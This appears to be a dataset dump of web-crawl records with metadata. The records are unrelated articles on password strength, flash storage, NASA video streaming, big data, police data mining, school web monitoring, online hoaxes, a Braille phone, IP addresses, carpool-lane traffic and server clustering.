text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
We understand that most of our clients are business-oriented and not security-focused, and so many don’t realize the true implications of a password compromise. For example, a client recently asked us to reset a password for one of their user’s email accounts and provided us with a very weak password to use (in fact, the username was the same as the password). After we explained how that new password would be easy for someone to guess they replied, “Oh it doesn’t really matter if someone breaks into this email account it’s not used for anything important”. A compromise of the email messages themselves is only one aspect. In most cases the reason email accounts are compromised is so that they can be used to send out spam. Imagine hundreds of thousands of spam emails being sent out from one of your email addresses. Not only can this affect your company’s reputation, but your mail server will likely get blacklisted which means important emails may not get received. Resolving blacklist issues can take time to resolve leaving your entire company’s email crippled for days. But the impact of blacklisting doesn’t only affect your users and domain, if you’re hosted on a shared mail server then all of the domains hosted on the same email server become blacklisted. Weak passwords can easily lead to a compromise of any service – ftp, control panel, database, email – as well as non-hosting related accounts such as facebook and your bank account, and each can have their own dire consequences. What is a Weak (bad) Password? Examples of bad passwords are those that: - contain a dictionary word, your username, company name, name or other identifying information (such as your pet or child’s name) – even if you add numbers or other characters after the word. - are too short (under 8 characters) - are commonly used passwords based on statistics of hundreds of thousands of passwords (password is not a good password, 123456 is also not a good password), but here’s 500 horrible passwords that are insanely popular as passwords and thus easily guessed: *please note this image contains foul language, so we do not recommend viewing it if you may be offended. (image credits: http://www.forevergeek.com/2010/07/500_worst_passwords) Most people will find that they have used passwords in the above lists. Note that attackers have lists that contain hundreds of thousands of passwords and use tools to test various combinations of passwords (such as adding numbers at the end of a word) How do I choose a Strong Password? There are many methods but here are some recommendations: - Use a random password generator – PC Tools has a really easy to use password generator at http://www.pctools.com/guides/password/ - Create a password from your favorite song – create a password from your favorite song lyric such as the first letter of each word, and mix in some other characters to strengthen the password. For example, “Twinkle, Twinkle Little Star, How I wonder what you are” could be: TtL*HIwwya5. Finally, it’s important to not use the exact same password for all your online services. Even if you have a very strong password – if the password is leaked due to a compromise of a service you use (social networking sites, online forums, etc) – attackers may try your password on other web sites to see if they can access your other accounts using the same password (banks, shopping sites where your password may be stored such as amazon.com, and other sites or services) HELP! How will I ever remember my new Passwords? The easiest way to manage your passwords security is by using a password storage application that runs on your computer and ideally also on your mobile devices so you can access your passwords from anywhere. It’s important to choose a password application that encrypts your passwords so if your PC or phone is stolen they would not be able to see your stored passwords. With a password application, you typically would only need to remember one password, and that master password unlocks the application so you get access to all your saved passwords. LastPass (https://lastpass.com) is a great option as it can sync your passwords across many computers and even devices (iPad, iPhone, Android), and it also has a built-in password generator. LastPass also has other useful features such as the ability to create secure notes, and securely save personal information so you can easily fill out online forms (including your credit card number if you wish). We hope this information has been helpful and highly advise all users to review all the passwords you currently have in place and find a password strategy that works best for you and your organization. Nathalie Vaiser, CEH, MCP, MCTS, Linux+ Nathalie’s personal blog: http://admingal.com Nathalie is the Virtualization Program Manager for Applied Innovations, a leading Windows web hosting provider at http://appliedi.net
<urn:uuid:6ef2f372-686a-43ce-8aa8-911fe67510a1>
CC-MAIN-2017-04
https://pentestlab.blog/2012/04/01/password-security-101/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00556-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931653
1,074
2.640625
3
What Is An All-Flash Array? An All-Flash Array, also referred to as a SSA or Solid State Array, is data storage that contains multiple Flash memory drives. All-Flash storage contains no moving parts, which means significantly less heat generated, less power utilized, and less maintenance. From a functional standpoint, All-Flash technology powered by Intel® Xeon® processors provides vastly superior performance; fewer spikes in latency, better disaster recovery, support of real-time analytics, much faster data transfer rates, and the ability to free IT staff to focus on other tasks. All-Flash Arrays provide the foundation for next-generation business applications, and the All-Flash data center. What Is Flash Storage? Flash Storage is storage media designed to electronically secure data. The media is designed to be electronically erased and reprogrammed. Flash represents a transformational shift in computing; by eliminating rotational delay and seek time, Flash provides responses orders of magnitude faster than traditional spinning disk. Flash Storage represents a performance breakthrough for storage operations (IO) and provides the foundation for enabling the next technology wave. What Is A Hybrid Flash Array? A Hybrid Flash Array is a combination of data storage units that utilize at least two types of storage media, one being Flash storage, the other being one of several possible options. Hybrid Flash arrays are used by businesses that have a need to store both hot and cold data in a single storage platform and want to balance performance and economics. Hybrid Flash arrays allow customers to choose the ratio of performance and capacity that best suits their specific needs to achieve the optimal value for their investment. The ability to add more Flash or capacity as needs dictate is a powerful benefit. What Is Flash Based Storage? Flash Based Storage is data storage media that delivers tremendous performance increases over traditional spinning hard disk drives. Flash Based Storage provides a dramatically lower cost per operation on a $/IO basis. This can save significant capital costs for most business workloads as well as virtual data center deployments that are practically ubiquitous in modern data centers. Virtualization causes a significant increase in IO density per server, a workload pattern that can often be significantly impacted and measured with increased performance and lower costs, by leveraging Flash Based Storage technologies. What Is Flash Technology? Flash Technology is any storage repository that uses Flash memory. Flash Memory comes in many forms, and you probably use Flash Technology every day. From a single Flash chip on a simple circuit board, to circuit boards in your phone, to a fully integrated “enterprise Flash disk” where multiple chips are used in place of a spinning disk, Flash Technology is everywhere! What Is Flash SSD? Flash SSDs are data storage devices that offer high performance, low latency storage, which provides significant performance, power consumption and cooling benefits over traditional spinning media. The I/O capability of Flash SSDs is 10x faster than spinning drives. Customers use Flash SSDs for the best application response time to run virtual servers and virtual desktops and to unleash the power of analytics for real-time decision making for the business. Ultrabook, Celeron, Celeron Inside, Core Inside, Intel, Intel Logo, Intel Atom, Intel Atom Inside, Intel Core, Intel Inside, Intel Inside Logo, Intel vPro, Itanium, Itanium Inside, Pentium, Pentium Inside, vPro Inside, Xeon, Xeon Phi, and Xeon Inside are trademarks of Intel Corporation in the U.S. and/or other countries.
<urn:uuid:a52c720f-953e-4045-82eb-d28f2a414f1c>
CC-MAIN-2017-04
https://www.emc.com/en-gb/storage/discover-flash-storage/definitions.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00372-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896833
710
3
3
NASA plans live video feed from space Video from a laboratory in the International Space Station will be available on the Internet - By Doug Beizer - Jan 29, 2010 NASA plans to stream live video from a laboratory inside the International Space Station and broadcast it on the Internet starting Feb. 1, a NASA official announced. The video will give the public an inside look at astronauts working in space, according to NASA. The video will be available during all crew duty hours. The space agency also recently started providing personal Internet access to astronauts aboard the space station. The new in-cabin streaming video will also include audio of communications between Mission Control and the astronauts, when available, according to NASA’s Jan. 27 announcement. Since March 2009, NASA has provided streaming video of Earth and the station's exterior as the laboratory complex orbits 220 miles above Earth. Video from the station is available only when the complex is in contact with the ground through its high-speed communications antenna and NASA's Tracking and Data Relay Satellite System. During "loss of signal" periods, Internet viewers may see a test pattern. When the space shuttle is docked to the station, the stream will include video and audio of those activities. Doug Beizer is a staff writer for Federal Computer Week.
<urn:uuid:3a44f568-2c5e-44f7-b901-e68d7b477afd>
CC-MAIN-2017-04
https://fcw.com/articles/2010/01/29/nasa-space-video.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00492-ip-10-171-10-70.ec2.internal.warc.gz
en
0.899543
265
2.953125
3
In the early 2000’s Doug Laney, vice president at research firm Gartner, defined the three Vs of big data: volume, velocity and variety. Since then, following the development of the big data trend, industry expert Mark van Rijmenam has added four extra Vs: veracity, variability, visualisation and value, to demonstrate how to deal with the demands of big data. So what are all these new Vs and what do they mean for big data? Has the concept of big data really changed? Veracity, the first new V, is essential for big data. For the analysis to be correct, the data itself must be accurate. The large volume and velocity of big data means that it is statistically likely to have a large number of errors. Good business analytics software should already have a data validation process. This means that, from the beginning, errors and discrepancies are spotted, so only high quality data is subsequently analysed, reported and actioned. Variability is an extension to Laney’s original variety. Big data collected from multiple sources can take a variety of different formats. Data can now be collected from transactions, social media comments or sensors. While this large amount of data can be beneficial to companies, it can be overwhelming if they don’t know how to properly action it. For example, in the retail industry companies improve their brand perception and customer loyalty by monitoring variables including purchasing habits, social media interaction or in-store complaints. The problem with variability, especially for social media, is that most analytics software will be unable to register the meaning of a tweet in context. Therefore, it cannot correctly evaluate whether it is a positive or negative reaction. Using advanced analytics software, businesses can perform sentiment analysis on this kind of data. It contains algorithms that can interpret the context of the message and decipher the correct meaning of the word in context. This makes the data collected accurate and means that it can be visualised correctly, as either a positive or a negative view. Although analysing big data can yield lots of useful information, many business leaders will struggle to make use of this if it is not presented in an easy to understand format. Powerful business analytics software is able to analyse data from multiple sources and convert it into one manageable stream of data. Businesses can then use this to change their processes quickly and easily, rather than having to manually correlate data across hundreds of files, documents and databases. One of the specific pressures of big data is speed. With the rise of the Internet of Things (IoT), more and more devices are becoming equipped with sensors that can feed back data. Although data analysts would traditionally use manually generated reports, new monitors such as smart meters demand near real time reporting. This is clearly impossible to do without the use of analytics software and means that quick and easy visualisation interfaces are essential. Although many analytics programmes can capture data in real time, some software relies on SQL queries to perform searches. Even for the most technologically savvy employees, generating these queries still takes time. This means that the queries are not truly representative of real-timing reporting. Software such as Connexica’s CXAIR features a user-friendly search-engine style interface, which allows anyone to generate accurate, up to date, reports and means that employees can view data and make decisions instantly. Smart visualisation is truly the first step to the democratisation of business intelligence — the ability for anyone in the business, regardless of their technical ability, to gain actionable insights from big data. This means that, instead of spending hours poring over complicated reports business leaders can roll out self-service analytics, making data accessible to all, from administration clerks to C-level leaders. The value of big data is in the analysis, not in the data itself. Research firm Mckinsey predicts that big data has a potential annual value of $250 billion to Europe’s public sector. However, this data is pointless and worth nothing if it cannot be effectively actioned. For example, the UK Mid Kent Services (MKS), a local authority partnership consisting of Maidstone, Swale and Tunbridge Wells Borough Councils, used Connexica’s CXAIR business analytics software to deal with a staggering volume of data. The data consisted of over 20 million car parking records, 500,000 service-call records and 65,000 council tax records. Certainly not an easy task. In the past, administrative staff had to spend time combining data from multiple data sources in order to prepare reports for managers. This was obviously a time consuming and inefficient manual process. Managers could see all of this information in one format, meaning that it could be transformed into actionable data. By eliminating the manual processing it was able to deliver reports much more quickly, more accurately and with information that could be actioned in a more timely manner. In the same way that Van Rijmenam’s additional Vs help us to better understand the complexities of modern big data, the same is true for the way we analyse data. Given the increase in the amount of data that businesses must now manage, it makes sense that they use effective ways to gather, sort and analyse it. This is where good business analytics software is indispensable – with the right software and the right plan, maintaining manageable and actionable data is no longer a daunting task. Greg Richards, sales and marketing director, Connexica
<urn:uuid:1d86ea32-6d7a-440d-9822-8ae9fe8ffad0>
CC-MAIN-2017-04
http://www.information-age.com/path-manageable-data-123462815/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00400-ip-10-171-10-70.ec2.internal.warc.gz
en
0.920714
1,132
2.828125
3
“The aim of education is to provide children with a sense of purpose and a sense of possibility and with skills and habits of thinking that will help them live in the world.” – Alice Waters In a recent study by Impero’s researchers, 96% of students polled said that their schools use website blocking to impose internet safety. Of those, 35% of students admitted to going around online blocks to access prohibited sites. These statistics suggest that merely blocking online access in schools just isn’t working. Instead of blocking websites, why not monitor student internet usage? Monitoring goes along with many core teaching principles that promote both higher level thinking in students and successful classroom management for teachers. Here are several of the advantages of monitoring, as related to insights from teaching experts and authors: Monitoring reinforces teaching procedures In his book, The First Days of School, teaching great Harry Wong said that classroom management overarches everything in the curriculum. He teaches that educators should have classroom routines. They should invest time in practicing classroom procedures with students until they become ingrained into daily activities. Wong’s technique for teaching procedures includes a three-step process: Explain, Rehearse, Reinforce, Remind, Experience When students are being monitored on the internet, procedures can be laid out by the teacher from the first day of school. Teachers can explain what students should do if they come across something inappropriate on the web. They can tell kids what to do if someone is bullying them online. They can also explain how to communicate these things in private without causing disturbances or being embarrassed. Teachers can then rehearse these procedures until students feel comfortable. Reinforcing the internet procedures, the teacher can continuously by reminding them and giving them experiences in which to practice. Creating procedures and following them allow the student to be empowered to make good choices. Procedures also allow the teacher to manage the classroom in a positive way that is not policing. Monitoring builds cognitive strategies In the best seller, A Framework to Understanding Poverty, Ruby Payne explains the benefits of mediation for students. Mediation is the intervention of an adult during a child’s response to mental stimulus. Mediation builds cognitive strategies, or those strategies that give individuals the ability to plan and systematically go through data. When a child doesn’t learn cognitive strategies, she lacks significant skills to navigate the world. Here are if/then statements that describe what happens when a child lacks cognitive strategies: How does this connect to monitoring internet usage instead of blocking it? Monitoring gives teachers and administrators the ability to mediate the decision-making processes of the student. By monitoring usage and teaching how to navigate the web in safe ways, teachers are able to build cognitive strategies in students, which in turn builds higher-level thinking and problem solving skills. Monitoring promotes Bloom’s highest level thinking According to Bloom’s Taxonomy Cognitive Domain, there are six levels of thinking. The highest level of thinking is Evaluation. Student behaviors that show the Evaluation level of thinking are assessing effectiveness of whole concepts, in relation to values, outputs, efficacy, viability, critical thinking, strategic comparison and review, judgment related to external criteria. When internet sites are blocked, the student is not given the opportunity to evaluate and create strategy, other than how to strategically hack through to sites that are banned. By monitoring the web, combined with providing procedures and communicating about problems, the teacher is providing opportunities for the highest level of Bloom’s thinking: Evaluation. Monitoring is proactive and reactive Impero software believes that monitoring online usage is the best way to help students learn to use the internet safely. Research has shown that blocking measures have little impact when students are determined to access content. Now is the time to adopt a different approach and monitor online behavior instead. This will allow schools to act proactively and react appropriately in the event of protocol breaches. Impero Education Pro software provides schools with the ability to proactively monitor the online activities of digital devices while they are being used in classrooms. To find out more about this solution go to the product features page here. Impero offers free trial product downloads, webinars, and consultations. Call us at 877.883.4370 or email us email@example.com today for more information. A Framework for Understanding Poverty – Ruby K. Payne, Ph.D 1995 The First Days of School – Harry Wong and Rosemary Wong 2009 A Taxonomy for Learning, Teaching, and Assessing – Anderson, Lorin W. (Editor)/ Krathwohl, David R. (Editor)/ Bloom, Benjamin Samuel (Editor) 2001
<urn:uuid:7491021e-f342-4878-9e6e-dee891b67da2>
CC-MAIN-2017-04
https://www.imperosoftware.com/website-monitoring-not-blocking-promotes-high-level-teaching-and-learning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936727
954
3.6875
4
A kid's game, sometimes called "Concentration," is a test of a player's memory. With a set of cards dealt face-down on a table, players take turns picking up two cards, hoping to find they are of the same value. If they don't match, the cards are returned to the table face-down. The challenge is to remember the location and value of the cards you or the other players pick up so in subsequent turns you're able to match them up. The player with the most pairs wins. Without proper investigation tools, police and law enforcement agencies may find themselves unwillingly playing their own game of "Concentration" as they wade through mountains of information available online. This is more true when investigating possible narcotics offenders. By its very nature, drug trafficking involves some organization -- transportation, distribution and sales "channels" -- all of which try to keep themselves hidden. Investigating such organizations may require correlating apparently unrelated information and finding submerged links between people and organizations. The growing amount of online data could make this work easier if access to it was automated. Florida's St. Petersburg Police Dept. had more online data than could be known or effectively used by detectives in the course of doing routine investigations. "We had 10 years of data in a fairly sophisticated database, and we could extract fields and look up data," said Leonard Leedy, a vice and narcotics detective with the St. Petersburg Police Dept. "We have also been sharing data with the Pinellas County Sheriff's office for 4 to 5 years. What we've been unable to do is extract information from the narratives of our reports." Under the department's system, officers enter basic information about an incident into an online form. This form includes such things as the names of involved parties, the time of the incident, etc. What officers do not type themselves are the narrative descriptions of the incident. Instead, they dictate the narratives, which are later transcribed. This method saves officers time and has proven a much more cost-efficient division of work. When the narratives are later transcribed, they are electronically associated with the basic data entered by the detectives. Although the narrative data has technically always been available online, the existing software couldn't search the narratives, let alone do sophisticated data mining to help identify links. Development of a system to access narrative data began a couple of years ago when representatives of the federal Counterdrug Technology Assessment Center (CTAC) approached the department. CTAC falls under the Office of National Drug Control Policy and is the "central counterdrug enforcement research and development organization of the U.S. government." "CTAC ... said they were interested in a project involving sharing of data and technology," said Leedy. "They sat 30 narcotics detectives down and asked them, 'If you wanted to have a computer that could do anything, what would it be?'" Following the initial meetings, the University of Tennessee got involved to do the application development. Rather than suggesting theoretical solutions from afar, the university took the time to really find out what was needed. "The university sent people down and they rode along with us to get a feeling for what life was really like," commented Leedy. "They came down and listened to us and the applications were developed based on the voiced needs of the working detectives" This development style is well known to CTAC's chief scientist and director, Albert E. Brandenstein. "I did a lot of command and control development with ARPA [now DARPA, the Defense Advanced Research Projects Agency] and other places," said Brandenstein. "Those kinds of projects are measured by hands-on success from the very beginning. You can't go away and develop for three years -- it's a matter of how the users like data presented to them." What came out of this design phase was a plan for several applications, collectively known as the West Florida Counterdrug Investigative Network (WFCIN). According to Brandenstein, the system included the first use of an ATM network for state or local law enforcement. The first application to be implemented gives officers the ability to data mine through information contained in the online narrative reports. This is done using a Web interface that talks through a backend process to the existing database system. Both the interface and the backend were developed by the university. For example, if a detective receives a report of an incident in which a drug dealer used a specific type of gun, he can enter the gun type and get back a standard HTML page with links to narrative reports in which that type of gun is mentioned. The application runs on a Sun workstation that was chosen, at least in part, because it provides a lot of freedom to scale the application -- downwards for other agencies with less online data -- and upwards as a department's data store grows. It has also proven very fast in doing searches. Currently, the application only accesses St. Petersburg Police Dept. databases, but future phases will extend the search to other jurisdictions so data can be shared between agencies. The second application to be implemented stores images -- surveillance photographs, evidence photographs or scanned newspaper articles. "It stores the images and links them to the case," said Leedy. "The University of Tennessee wrote a very neat package we use to scan our photographs using standard software -- we have an HP 4C scanner and digital cameras and use the shareware Paintshop Pro (by JASC Software) to store the images on the hard drive. Using the WFCIN application, you go into the image import program, which grabs the image. The application automatically creates the thumbnails, scales them and stores them linked to the case. "Say you have 100 images on a case, and one is a photograph of a gun under a bed. The user can go into the comments section and type in 'gun under bed.' The application links the comments to the photo and stores that information. When you are done, the comments become part of the data mining source file; so now, if you type in 'gun under bed,' it will not only search the narratives, but also the photos associated with it," said Leedy. Searches will return links to both the text-based narrative and the images. The network's image-carry capacity extends to realtime audio and video for teleconferencing -- or for sharing video monitoring tapes with law enforcement officers in other jurisdictions -- although these applications have yet to be implemented. Another WFCIN application, which is still about 3 to 6 months from general use, will provide "link analysis." Link analysis is a tool that graphically displays connections or "links" between individuals, groups and organizations. "This has been done in the Dept. of Defense (DOD) for years," noted Brandenstein, "but our goal was to scale the applications to the users and to make the technology affordable. Link analysis is commonly done on Crays in the DOD -- now it is being done on Sun workstations." The link analysis application starts with a circle in the center -- this could represent an individual or an organization -- and then draws lines to circles representing other groups or individuals to whom the central person is connected. Those circles, in turn, will have lines drawn to their connections. This kind of functionality can help locate associations that otherwise would have gone unnoticed and that may be key to developing a case or directing an investigation. The Complete Package CTAC's part in the WFCIN project is to help develop these applications and then provide a means for exporting and customizing them for other jurisdictions. "This year, Congress has appropriated a technology transfer pilot program to take some of this technology and widen the audience," said Brandenstein. "We were also directed to come up with area experts to help decide on where this goes and how it is to work." To accomplish this, CTAC planned a meeting early this year to bring together experts from around the country to review the technology and help advise on the direction for future research. The data mining applications being developed and used by St. Petersburg Police Dept. are still in the beginning stages, but they show the promise of things to come. A complete, integrated package that allows investigators to search across jurisdictions for common characteristics and build link analysis charts to help identify the key culprits and their associates will help bring crime investigation and prosecution into the 21st century. Such tools should help take police out of the business of playing "Concentration" with online data and put them more solidly in the business of directing and completing investigations. February Table of Contents
<urn:uuid:297350ac-f9b6-428d-971d-84215abb5a58>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/Finding-Connections-Data-Mining-and-the.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00180-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960271
1,747
2.640625
3
Long before there was a World Wide Web, when the internet was largely a playground for academics and the military, and most people still thought spam was a canned meat, there were already hoaxes and scams (pyramid schemes, Ponzi schemes, lures into premium rate phone services, fake friends and stalkers...). Early internet worms evolved into the mass-mailers of the last decade and then into Facebook clickjacking apps. Old-school viruses evolved into a range of threats from botnets to specialized banking trojans to the highly specialized attacks that some call APTs . And just as the pre-WWW world of Usenet and email morphed into social networks and Twitter, so too did malicious social engineering – focused on psychological manipulation rather than malicious code – adapt effortlessly to the new environment. Hoaxes and scams both incorporate deception, and may even look very similar, but scams are largely motivated by profit. The hoaxer is more likely to be bolstering his/her own self-esteem by proving how stupid others are than anticipating any financial gain. There’s an interesting parallel here. Before the malware scene became all about profit, virus writing was mostly about glorifying the virus writer and giving them 'bragging rights' among peers, though in some cases there was a clear intent to do damage to data. Similarly, while the contemporary scammer or malware writer is happy to exploit gullibility for profit, the hoaxer usually contents themselves with proving that other people are more ‘stupid’ than they are. However, it’s likely that profit-driven scammers sometimes justify their activities to themselves by stressing the victim’s undesirable stupidity: de-personalization of the victim is a significant factor in preserving the criminal’s favorable self image.
<urn:uuid:8b46f2a7-4c7e-4e9e-9f3b-e9ee6d260380>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/blogs/cruising-the-misinformation-superhighway/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00298-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963934
366
2.71875
3
World's first Braille smart phone will soon be a reality Several years ago, the FOSE trade show hosted a panel on accessibility in government IT. One question in particular stuck with me to this day: A blind gentleman asked the panelist from Research In Motion (now BlackBerry) when they would put out a BlackBerry for the blind. Of course, back then no one had a good answer for him, even though the question got a near-standing-ovation from the audience. Well, that question may soon be answered. A developer in India by the name of Sumat Dagar has developed the world’s first Braille smart phone. "This product is based on an innovative 'touch screen' which is capable of elevating and depressing the contents it receives to transform them into 'touchable' patterns," Dagar told the Times of India. He developed this specifically because he saw that technology tended to serve the mainstream and ignore anyone with special needs. The phone uses Smart Memory Alloy technology to make small pins rise out of the body of the device in patterns, so they could form Braille letters or any other necessary shape. The alloy will form into one of these two states (up or down) depending upon what electrical impulses it gets. Braille seems to be gradually — very gradually — working its way into the mobile device world. Early in 2012, researchers at Georgia Tech produced a prototype app that uses Braille for touch-screen devices, although the researchers envision that as an app for any smart phone user who wants to text without looking at the screen. And a university student in England has designed a DrawBraille Mobile Phone, but it remains in the concept stage. Improvements in touch-screen technology, such as the Smart Mobile Alloy in Dagar’s phone or the microfluidics screens from Tactus Technology, could make smart phones for the blind more viable. Section 508 of the Rehabilitation Act Amendments requires federal agencies to ensure that the electronics and IT products they buy are accessible. With regard to smart phones, it has to date focused on apps. But with mobile devices becoming common tools for employees and citizens, the option for phones that accommodate the visually impaired could become a necessity. Posted by Greg Crowe on May 01, 2013 at 9:39 AM
<urn:uuid:4d6d85f8-93c0-48a4-ad52-1f1512e92f85>
CC-MAIN-2017-04
https://gcn.com/blogs/mobile/2013/05/braille-smart-phone.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00024-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949237
468
3
3
What is an IP Address? (Internet Protocol Address) Every system connected to the Internet has a unique IP address, which consists of a string of numbers that identifies a computer or server on the Internet. The format of an IP address is a 32-bit numeric address written as four numbers ( 192.168.10.1 ) separated by periods, for example, 188.8.131.52 is your IP address. Computers have no problems with locating and remembering numeric addresses. In contrast, most humans have trouble remembering long, complicated sequences of numbers. So, to make surfing the web easier, the DNS domain name system was invented. This system allows people to use easy to remember names for web sites instead of those numbers. So what are a few of the the reasons you would want to know your IP Address? - "Remote Access" applications such as PCAnywhere are just one reason you need to find your IP address. You need to know your IP Address in order to use this Remote Access Applications. These Remote Access Applications allow you to access your PC from another PC over a network. XP also offers a Remote Access applicatiom to connect 2 PCs. As a note you can use these Remote Access applications over most connections from your home or office. Local Area Networks (LAN), Wide Area Networks (WAN), ADL, Cable, ISDN and even dialup phone connection work well with Remote Access applications. There are many ways to stay safe while browsing the internet: There are firewalls, VPNs, and a variety of other types of programs that'll help you stay secure online. A good resource is VPN at ATT.com if you want to find out more about what VPNs are and what they do. - "Multi-user Internet Games" also require you need to know your IP Address.
<urn:uuid:551f042f-71b5-4c88-a23f-824bb0d9548b>
CC-MAIN-2017-04
http://myrouterip.com/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00291-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941258
384
3.09375
3
Transportation researchers affiliated with the University of California, Berkeley, have used roadway sensor data to come to a surprising conclusion: Discontinuing a program that gave solo drivers of hybrid vehicles access to carpool lanes has slowed traffic in all lanes. Conventional wisdom would lead one to believe that with fewer hybrids in the carpool lane, the traffic in that lane would speed up. But that hasn’t been the case. Everybody has slowed down — the drivers of hybrid vehicles and all other motorists on the road. “Drivers of low-emission vehicles are worse off, drivers in the regular lanes are worse off, and drivers in the carpool lanes are worse off. Nobody wins," said Michael Cassidy, University of California, Berkeley, professor of civil and environmental engineering, in a news announcement from the university. Cassidy and a graduate student studied six months’ worth of data from roadway sensors in the San Francisco Bay Area before and after the carpool lane privileges were revoked for hybrid cars. For one stretch of freeway in Hayward, Calif., the researchers concluded that carpool lane speeds were 15 percent slower after hybrids were expelled. One, the researchers found that when hybrids moved back into the regular traffic lanes, those lanes were slower — and that contributed to a slowdown in the adjacent carpool lane. "As vehicles move out of the carpool lane and into a regular lane, they have to slow down to match the speed of the congested lane," explained Kitae Jang, the doctoral student who contributed to the research. "Likewise, as cars from a slow-moving regular lane try to slip into a carpool lane, they can take time to pick up speed, which also slows down the carpool lane vehicles." Two, in Cassidy’s words, “Drivers probably feel nervous going 70 miles per hour next to lanes where traffic is stopped or crawling along at 10 or 20 miles per hour. Carpoolers may slow down for fear that a regular-lane car might suddenly enter their lane.” The researchers said that in order to improve traffic flow, more vehicles — not fewer — should be allowed into carpool lanes. The researchers presented their results in a report published by UC-Berkeley’s Institute of Transportation Studies. The researchers’ paper is available here. According to the university, in 2005 California began giving low-emission vehicles, including hybrids, a yellow sticker that qualified them to drive legally in the carpool lane. An estimated 85,000 hybrids in the state had the passes. The program was discontinued July 1 in order to comply with a federal regulation that, according to the Institute of Transportation Studies, requires low-emitting vehicles “be expelled from a carpool lane when traffic slows to below 45 mph on any portion of that lane during more than 10 percent of its operating time.”
<urn:uuid:872f3960-c96c-4de2-96a1-d489b8415681>
CC-MAIN-2017-04
http://www.govtech.com/transportation/Kicking-Hybrids-from-Carpool-Lanes-Slows-Traffic.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00501-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965962
588
2.9375
3
Server Clustering Basics With the cost of computer hardware decreasing on a daily basis, many organizations are turning to server clustering as a means of increasing their server uptime. The term “clustering” might be familiar from your IT travels. It certainly gets quite a bit of press, and for some very good reasons. This article will explore server clustering, with the assumption that you have no prior familiarity with clustering technology, but do have an intermediate understanding of PC hardware, computer networking and server operating systems. What Is a Server Cluster? In its most elementary definition, a server cluster is at least two independent computers that are logically and sometimes physically joined and presented to a network as a single host. That is to say, although each computer (called a node) in a cluster has its own resources, such as CPUs, RAM, hard drives, network cards, etc., the cluster as such is advertised to the network as a single host name with a single Internet Protocol (IP) address. As far as network users are concerned, the cluster is a single server, not a rack of two, four, eight or however many nodes comprise the cluster resource group. Several different server operating systems support cluster configurations. Probably the two dominant cluster-aware server operating systems in today’s IT marketplace are the myriad Linux distributions and Microsoft Windows Server 2003 Enterprise Edition and Datacenter Edition. Novell NetWare 6.x also supports clustering services. Why Deploy a Server Cluster? The chief advantages for organizations that deploy cluster server configurations are high availability, high reliability and high scalability. High availability refers to the ability of a server to provide applications and services to users often enough to meet or exceed an organization’s uptime goals. A cluster server configuration provides a higher degree of availability to services and applications than a non-clustered server configuration. High reliability means that a server computer provides fault tolerance in the event of system failure. Fault tolerance, in turn, eliminates a single point of failure for a particular subsystem (be it the hard-disk subsystem, CPU subsystem, power supply subsystem, etc.) by providing redundancy. Server clustering takes high reliability a step further by providing fault tolerance for applications and services running on the cluster resource group. For instance, if one node in a cluster were to fail, the other nodes could continue to provide applications and services for the rest of the network. The network’s end users never need to know there was a hardware or software failure on a server computer. High scalability denotes the capacity of a network environment for future growth with an eye toward improved performance. Specifically with regard to clustered server implementations, server nodes can be scaled up by adding additional hardware resources to each node, such as additional CPUs, RAM, hard drives, etc. Clustered servers can be scaled outward by adding more nodes to the resource group. Availability, reliability and scalability lead many organizations to set up a clustered server environment. But are there any immediate downsides to a clustered environment? Obviously, additional cost is a concern. Even with server hardware costs being relatively low nowadays, a quad-processor RAID-5 server computer does not come cheap. Add to that the licenses involved for enterprise versions of your server operating system, relational database management system (RDBMS) software, Web server software and so on, and the costs are not insignificant. Another consideration before deploying and maintaining a clustered server environment is the additional training that may be required for an organization’s IT staff to become proficient in setting up and operating the cluster. Again, these costs, which might involve instructor-led training, certification exams and overtime pay, must not be taken lightly by organization decision-makers. How Are Server Clusters Implemented? Most commonly, server clusters are known as either server farms or server packs. A server farm is a clustered group of server computers that run the same applications and services but do not share the same repository of data. That is, each node in a server farm stores its own local, identical copy of a data repository that is periodically synchronized with the other nodes in the server farm. An example of a server farm would be a cluster group of Web servers, where each server might run a local instance of Microsoft Internet Information Services. However, the cluster handles requests for service with each node retrieving data from its own local data store. By contrast, a server pack is a clustered group of server computers that runs the same applications and services and also shares a common data repository. A good example of a server pack would be a cluster of nodes running Microsoft SQL Server. In a server pack configuration, all nodes in the cluster connect to a separate, shared disk subsystem and retrieve data from the shared data store. Fibre Channel and SCSI are the two most common interface technologies in use today for shared disk storage among cluster nodes. Tim Warner is director of technology for Ensworth High School in Nashville, Tenn. He can be reached at email@example.com.
<urn:uuid:a52cee53-68e7-4e4f-b527-f49062156b8c>
CC-MAIN-2017-04
http://certmag.com/server-clustering-basics/
null
